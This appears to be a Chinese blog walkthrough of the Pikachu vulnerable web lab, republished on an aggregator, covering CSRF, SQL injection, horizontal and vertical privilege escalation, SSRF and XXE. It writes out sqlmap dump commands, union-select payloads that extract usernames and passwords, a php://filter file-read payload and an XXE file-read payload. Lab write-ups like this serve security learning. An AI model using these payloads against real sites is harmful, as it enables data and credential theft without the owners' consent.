pikachu下

news2024/9/20 5:34:00

CSRF(跨站请求伪造)

CSRF(get) 

url变成了这样了,我们就可以新开个页面直接拿url去修改密码

http://pikachu-master/vul/csrf/csrfget/csrf_get_login.php?username=1&password=2&submit=Login

CSRF(post)

这里只是请求的方式不同,操作步骤与get型完全相同

CSRF Token

token的工作原理我在暴力破解板块有介绍,这里就不多说了

简单来说,后台会对我们在url中提交的token和服务器中生成的token进行比较,这里我们就无法通过伪造url进行修改个人信息了

SQL-Inject(SQL注入漏洞)

数字型注入(POST)

可以看到这关是postr注入,所以我们进行BP抓包

用SQLmap进行自动化注入,下面是payload

python sqlmap.py -r "E://1.txt" --batch --dbs//爆库
python sqlmap.py -r "E://1.txt" --batch -D dvwa --tables//爆表
python sqlmap.py -r "E://1.txt" --batch -D dvwa -T users --columns//爆字段
python sqlmap.py -r "E://1.txt" --batch -D dvwa -T users --dump//查询全部字段
python sqlmap.py -r "E://1.txt" --batch -D dvwa -T users --dump -C "user,password"//只查询账户和密码

字符型注入(get)

和上面的一样,这里举个payload的例子,这里用-u

python sqlmap.py -u "http://pikachu-master/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --batch --dbs

搜索型注入

先抓包看看是get型的还是post型的,剩下的使用sqlmap和上面的一样

xx型注入

先抓包看看是get型的还是post型的,剩下的使用sqlmap和上面的一样

insert和update注入

python sqlmap.py -u"http://pikachu-master/vul/sqli/sqli_iu/sqli_reg.php" --data "username=1&password=1&sex=1&phonenum=1&email=1&add=1&submit=submit" --batch --dbs

也可以像第一个一样进行-r注入

delete

和上面的一样

UA头注入

POST /vul/sqli/sqli_header/sqli_header_login.php HTTP/1.1
Host: pikachu-master
User-Agent:*
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Origin: http://pikachu-master
Connection: close
Referer: http://pikachu-master/vul/sqli/sqli_header/sqli_header_login.php
Cookie: PHPSESSID=scsmsuvjoecui8foom87nm00j2
Upgrade-Insecure-Requests: 1
Priority: u=0, i

username=1&password=1&submit=Login

-r文本的内容,其他的一样,注意referer哪里是个*号

基于boolian的盲注

和上面的一样和上面的一样

基于时间的盲注

和上面的一样和上面的一样

宽字节注入

我们先简单了解下原理

宽字节注入利用Unicode编码中的特性,将特殊字符转换为双字节字符,绕过输入过滤和检查,从而执行恶意的SQL查询宽字节注入利用Unicode编码中的特性,将特殊字符转换为双字节字符,绕过输入过滤和检查,从而执行恶意的SQL查询

name=1%df' union select version(),database() --+

查字段名

name=1%df' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273--+

name=1%df' union select group_concat(username),group_concat(password) from pikachu.users --+

Over Permisson(越权漏洞)

水平越权

我们根据提示随便登录一个账号

我们点击查看个人信息

我们可以通过修改url中的用户名查看其他人的信息

实现水平越权

垂直越权

提示告诉我们有普通用户和超级用户

我们先分别登录普通用户和超级用户看一下有什么区别

普通用户

超级用户

超级用户多了添加的功能

我们选择添加用户并复制下添加用户页面的URL

退出登录,重新登录pikachu用户

粘贴我们刚才复制的添加用户的url

我们的piakchu用户也可以添加用户了

我们添加一个demo用户试一下

重新登录admin用户看看是否够创建成功

创建成功

SSRF(Server-Side Request Forgery)

SSRF(curl)

来到题目,我们发现是通过url参数进行传递请求的

我们可以让他访问我们服务器上的木马文件(这里我就用本地演示了)

注意,红框中的地址正常应该是自己服务器的地址,这里我为了方便就拿本地机器做实验了 ,这里成功执行了我写的phpinfo文件

这里也可以利用其他协议进行操作,如file读取本地文件,就不具体演示了

SSRF(file_get_content)

这里的利用方式与上一关相同,不同一点是这里可以使用php的伪协议了

比如,可以使用php://filter读取文件

?file=PHP://filter/read=convert.base64-encode/resource=c:../../../windows/win.ini

然后去base64解码可以获得数据

XXE(XML External Entity attack)

不会XXE的看XXE漏洞-CSDN博客

直接构造paylaoad

<?xml version="1.0"?>
<!DOCTYPE ANY [
     <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"> ]>
<a>&xxe;

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2129952.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【解决】AnimationCurve 运行时丢失数据问题

开发平台&#xff1a;Unity 2022 编程平台&#xff1a;Visual Studio 编程语言&#xff1a;CSharp   一、问题背景 如上图所示的 GracityComponent 组件中&#xff0c;引用 AnimationCurve 作为可调属性。但在实际使用中出现数据丢失问题。大致为以下两种情况&#xff1a; 运…

图计算:基于SparkGrpahX计算聚类系数

图计算&#xff1a;基于SparkGrpahX计算聚类系数 文章目录 图计算&#xff1a;基于SparkGrpahX计算聚类系数一、什么是聚类系数二、基于SparkGraphX的聚类系数代码实现总结 一、什么是聚类系数 聚类系数&#xff08;Clustering Coefficient&#xff09;是图计算和网络分析中的…

【Python爬虫系列】_016.关于登录和验证码

我 的 个 人 主 页&#xff1a;&#x1f449;&#x1f449; 失心疯的个人主页 &#x1f448;&#x1f448; 入 门 教 程 推 荐 &#xff1a;&#x1f449;&#x1f449; Python零基础入门教程合集 &#x1f448;&#x1f448; 虚 拟 环 境 搭 建 &#xff1a;&#x1f449;&…

【UI】element ui table(表格)expand实现点击一行展开功能

文章目录 前言涉及知识点&#xff1a;代码部分隐藏小箭头总结 前言 element ui是一个非常不错的vue的UI框架&#xff0c;element对table进行了封装&#xff0c;简化了vue对表格的渲染。 element ui表格中有一个功能是展开行&#xff0c;在2.0版本官网例子中&#xff0c;只可以…

Linux和C语言(Day 12)

一、学习内容 存储类型 定义变量语法格式 数据类型 变量名; 存储类型 数据类型 变量名; 【定义变量可以省略存储类型&#xff0c;默认是auto】 定义函数语法格式 数据类型 函数名(参数){} 存储类型 数据类型 函数名(参数){} 【定义函数可以省略存储类型&#xff0c;默认是exte…

【PostgreSQL】安装及使用(Navicat/Arcgis),连接(C#)

简介 PostgreSQL 是一个功能强大的开源对象关系数据库系统 下载地址 PostgreSQL: Downloads 由于我电脑上安装的是arcgispro3.1所以需要下载对应的postgresql版本 PostgreSQL 12 对应的 PostGIS 版本主要是 3.5.0 或更高版本。 安装 一般设置为postgresql 安装扩展插件 此…

计算机的错误计算(九十一)

摘要 讨论自然对数 ln(x)的计算精度问题。 例1. 计算 ln(0.999999999999996) . 不妨用Python计算&#xff0c;则有&#xff1a; 若用Java代码计算&#xff1a; import java.lang.Math; public class Ln{public static void main(String[] args) {double x 0.9999999999999…

JMeter脚本开发

环境部署 Ubuntu系统 切换到root用户 sudo su 安装上传下载的命令 apt install lrzsz 切换文件目录 cd / 创建文件目录 mkdir java 切换到Java文件夹下 cd java 输入rz回车 选择jdk Linux文件上传 解压安装包 tar -zxvf jdktab键 新建数据库 运行sql文件 选择sql文件即…

操作系统 ---- 调度算法的评价指标

一、调度算法评价指标 1.1 CPU利用率 资源利用率。为提高系统的资源利用率&#xff0c;应使系统中的处理机和其它所有资源都尽可能地保持忙碌状态&#xff0c;其中最重要的处理机利用率可用以下方法计算&#xff1a; 例题&#xff1a; 1.2 系统吞吐量 由于吞吐量是指在单位…

Playwright与Selenium的对比:谁是更适合你的自动化测试工具?

在自动化测试领域&#xff0c;Selenium 一直是行业的标杆工具。它功能强大、支持多浏览器、广泛应用于各类项目中。然而&#xff0c;随着技术的发展&#xff0c;新的工具不断涌现&#xff0c;Playwright 作为其中的佼佼者&#xff0c;以其现代化的设计和强大的特性吸引了越来越…

828华为云征文|docker部署kafka及ui搭建

1.介绍 1.1 什么是华为云Flexus X实例 最近华为云828 B2B企业节正在举办&#xff0c;Flexus X实例的促销也非常给力&#xff0c;大家可以去看看。特别是对算力性能有要求&#xff0c;同时对自建MySQL、Redis、Nginx性能有要求的小伙伴&#xff0c;千万不要错过。Flexus云服务器…

你都学会栈和队列了赶紧手搓一个对象池吧!!!(超详细,超简单适合新手宝宝学习)

前置知识&#xff1a;en造数据结构与算法C# 用数组实现个栈还不简单&#xff1f;&#xff1f;&#xff1f;看我一秒破之&#xff01;&#xff01;&#xff01;&#xff08;unity演示&#xff09;-CSDN博客 c#有官方造好的关于stack的轮子&#xff0c;建议学习学习拿来直接用 …

揭开OpenAI草莓模型神秘面纱——重塑大语言模型的逻辑能力

OpenAI即将发布“草莓”模型 来源&#xff1a;medium 据报道&#xff0c;OpenAI计划在未来两周内发布其新的AI模型Strawberry&#xff08;草莓&#xff09;。据 Seeking Alpha周二&#xff08;9 月 10 日&#xff09;援引The Information 的一篇付费文章报道&#xff0c;新模型…

Solana核心漏洞技术详解

8月9日&#xff0c;Solana团队齐心协力解决了一个严重的安全漏洞。这次秘密修复详情可以在GitHub上查询到。CertiK团队对这一漏洞进行了深入分析。 1. Solana漏洞起因 8月9日&#xff0c;Solana验证者和客户端团队齐心协力解决了一个严重的安全漏洞。Solana验证者Laine表示&am…

[WUSTCTF2020]颜值成绩

1.测试输入发现存在数字型sql注入 1 and 1 报错 尝试了几个字符&#xff0c;确定空格被过滤了 空格用/**/替换 1/**/and/**/1 构造轮子尝试成功&#xff0c;所以这里要用布尔注入 后面的思路就是比较常规的了&#xff0c;先爆破库名&#xff0c;再爆破表、字段 写了个脚本简…

第四部分:1---文件基础理解、C语言文件操作、Linux系统文件接口、使用一个变量传递多个标志位

目录 文件基础理解&#xff1a; 文件是如何组成的&#xff1f; 对文件操作的本质是什么&#xff1f; 文件被打开的本质是什么&#xff1a; 进程和文件的调度关系解析&#xff1a; 文件被打开后如何被管理&#xff08;文件描述符/文件描述符表&#xff09;&#xff1f; 文…

深度学习——基础知识

深度学习的重点在于优化&#xff0c;其中很重要的步骤在于如何调参&#xff0c;会涉及到一些微积分等数学知识。不同于以往接触到的数值运算&#xff0c;深度&#xff08;机器&#xff09;学习都是关于张量Tensor&#xff08;向量&#xff09;的计算&#xff0c;Python中最常用…

【oj刷题】滑动窗口篇:滑动窗口的应用场景和注意事项

前言&#xff1a; 滑动窗口其实基本原理还是双指针&#xff0c;但在双指针中左右指针可能会有回退操作&#xff0c;而滑动窗口的左右指针只会向前走&#xff0c;不会回退&#xff0c;下面就来讲解一下滑动窗口的概念和具体操作&#xff08;主要是例题讲解&#xff09; 目录 一、…

【 Linux】基础命令及常用小技巧

文章目录 Linux基础命令常用小技巧基本命令pwd : print work directory 打印当前的工作目录cd : change driectory 改变当前工作目录ls: list 查看指定目录下的文件mkdir: make directory 创建目录 文件操作命令查找命令管道命令和过滤命令wc : word count 单词统计echo 输出命…

Hotohiko Sakamoto算法,以及用其计算星期几【算法 15】

探索Hotohiko Sakamoto算法&#xff1a;构建素数排列的奥秘 在算法领域&#xff0c;Hotohiko Sakamoto算法以其独特的构造方式和深刻的数学背景&#xff0c;吸引了众多算法爱好者和研究者的关注。本文将带您一起探索Hotohiko Sakamoto算法的核心思想&#xff0c;了解它是如何构…